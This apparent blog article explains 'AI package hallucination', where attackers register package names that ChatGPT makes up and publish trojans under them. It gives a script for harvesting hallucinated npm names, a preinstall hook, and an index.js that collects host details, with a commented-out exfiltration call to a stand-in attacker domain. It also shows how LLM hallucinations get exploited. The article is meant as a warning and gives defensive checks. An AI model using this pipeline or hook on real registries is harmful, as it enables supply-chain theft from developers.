Recently, I came across a very clever attack method involving ChatGPT, and I would like to share it as a word of caution.
Whether or not you have a technical background, I recommend familiarizing yourself with this attack method; it is better to be prepared.
As we all know, current large language models tend to hallucinate to some extent when answering. A hallucination is when the AI confidently fabricates content that does not exist.
When you use AI to learn about unfamiliar topics, it is easy to trust its answers without question, especially the various links it provides.
This actually hides a huge risk.
For example, suppose a developer asks ChatGPT how to use a certain Python web-scraping package and requests a code example.
Because the model's training data is outdated, and because of hallucination, its answer may contain names of, and links to, packages that do not exist.
A hacker who wants to exploit this only needs to identify which of those packages or links do not exist, register the corresponding package names or domains, and quietly put their own trojan tools in their place.
As a result, the next time ChatGPT returns that package address in an answer, it will point to the hacker's trojan tool. If the user runs the code locally, personal privacy data can be leaked!
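To make the attacker's first step concrete, here is a minimal sketch (assuming Node.js 18+ with its built-in fetch; the function name is my own). Checking whether a Python package name recommended by the AI is actually claimed on PyPI takes a single request, and a 404 tells the attacker the name is free to register:

```javascript
// Minimal sketch: ask PyPI's public JSON API whether a package exists.
// A 404 response means nobody has published under that name -- exactly
// the gap a squatter looks for.
async function pypiPackageExists(name) {
  const res = await fetch(`https://pypi.org/pypi/${name}/json`);
  return res.status !== 404;
}

console.log(await pypiPackageExists("requests")); // true: a well-known real package
```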
This new type of attack, which plants malicious installation packages, is called “AI Package Hallucination”.
The attacker harvests the sources, links, blog posts, and statistics that appear in AI hallucinations, and uses ChatGPT itself as a ready-made distribution channel to mass-produce and spread all kinds of malicious data.
So, how can we find those non-existent installation packages recommended by ChatGPT?
Since the advent of ChatGPT, many people no longer use Stack Overflow to solve programming problems; when a program throws an error, their first reaction is to ask ChatGPT how to resolve the error message.
Exploiting this habit, we can first crawl frequently asked questions from the Stack Overflow website, then send those questions to ChatGPT through its API and collect the answers.
After narrowing down the scope step by step, we find that the question format “How to xxx” is the most common on Stack Overflow.
We interact with ChatGPT in this way and store the conversations locally. A script then scans the answers and extracts the installation packages that do not exist.
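A minimal sketch of that pipeline, assuming Node.js 18+ and the official openai npm SDK; the question list, model name, and the "npm install" regex are illustrative assumptions, not the researchers' actual code:

```javascript
import OpenAI from "openai";

const client = new OpenAI(); // reads OPENAI_API_KEY from the environment

// Illustrative "How to xxx" questions; the real experiment fed in
// questions crawled from Stack Overflow.
const questions = [
  "How to integrate ArangoDB in Node.js? Please provide the npm install command.",
];

for (const question of questions) {
  const resp = await client.chat.completions.create({
    model: "gpt-3.5-turbo", // assumed model; any chat model works
    messages: [{ role: "user", content: question }],
  });
  const answer = resp.choices[0].message.content ?? "";

  // Pull every "npm install <name>" out of the answer text.
  const names = [...answer.matchAll(/npm install\s+([@\w./-]+)/g)].map((m) => m[1]);

  // Keep only the names the public registry has never heard of.
  for (const name of names) {
    const res = await fetch(`https://registry.npmjs.org/${name}`);
    if (res.status === 404) console.log(`hallucinated package: ${name}`);
  }
}
```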
The final experiment shows that when asking ChatGPT technical questions about Node.js, more than 200 questions yielded over 50 npm packages that had never been published; for Python, 227 questions yielded over 100 never-published packages.
Here, we take the Node.js installation package arangodb as an example to reproduce the entire attack process.
First, we ask ChatGPT:
How to integrate the arangodb installation package in Node.js, please provide the npm install method.
Next, we ask a second question:
Please provide more NPM package installation solutions.
ChatGPT then recommends an installation package that does not exist on npm.
At this point, suppose we have already created a trojan package under that name and published it to NPM.
When a user installs the package, npm's preinstall phase executes the command node index.js.
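Concretely, the hook lives in the trojan package's own manifest. A minimal package.json illustrating the mechanism described above (the name mirrors the article's example; the other fields are placeholders):

```json
{
  "name": "arangodb",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "node index.js"
  }
}
```

npm runs a dependency's preinstall script automatically during installation, so nothing beyond npm install is required from the user.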
In index.js, we can include arbitrary scripts, for example to collect the user's device hostname, the module's directory path, and so on, and send this information to our own server.
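Here is a deliberately harmless sketch of what such an index.js could look like; it only prints the collected fields, and the exfiltration call is shown as a comment pointing at a reserved example domain:

```javascript
// index.js -- runs automatically via the preinstall hook above.
const os = require("os");

const info = {
  hostname: os.hostname(), // the user's device hostname
  moduleDir: __dirname,    // the module's directory path
  platform: os.platform(),
};

// This sketch only prints locally. An attacker would instead send it out:
// fetch("https://collector.attacker.example/report", {
//   method: "POST",
//   body: JSON.stringify(info),
// });
console.log(JSON.stringify(info));
```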
This completes the entire information-collection process. Unless users capture network traffic or read the package's source code, it is very hard to notice the trick.
To be honest, as long as LLM hallucinations exist, attackers can exploit them to devise many attack methods we can hardly imagine.
The best defense is to not fully trust the information AI returns: when it recommends an installation package, first look up the package's release date, GitHub stars, download counts, and so on.
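Those checks can even be scripted. A small sketch (Node.js 18+ again; registry.npmjs.org and api.npmjs.org are npm's public endpoints, while the package name passed in is just an example):

```javascript
// Vet an AI-recommended package before installing it.
async function vetPackage(name) {
  const meta = await fetch(`https://registry.npmjs.org/${name}`);
  if (meta.status === 404) {
    console.log(`${name}: does not exist on npm -- do not install!`);
    return;
  }
  const data = await meta.json();
  console.log(`${name} first published: ${data.time?.created}`);

  const dl = await fetch(`https://api.npmjs.org/downloads/point/last-week/${name}`);
  const { downloads } = await dl.json();
  console.log(`${name} downloads last week: ${downloads}`);
  // A brand-new package with near-zero downloads deserves extra scrutiny.
}

await vetPackage("arangojs"); // the real ArangoDB driver, for comparison
```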
Be cautious, as carelessness can give hackers an opportunity.
However, from the perspective of network security offense and defense, the ingenuity of this attack method is indeed astonishing.
END
Unheard Code·Knowledge Planet is now open!
One-on-one Q&A for crawler-related questions
Career consulting
Interview experience sharing
Weekly live sharing
…
Unheard Code·Knowledge Planet looks forward to meeting you~
Employees of first and second-tier companies
Programming veterans with over ten years of experience
Students from domestic and foreign universities
Beginners still in primary or secondary school
We are waiting for you in the “Unheard Code Technical Exchange Group”!
How to join: Add WeChat “mekingname” and note “fan group” (No advertisements, serious inquiries only!)
Share good articles with friends~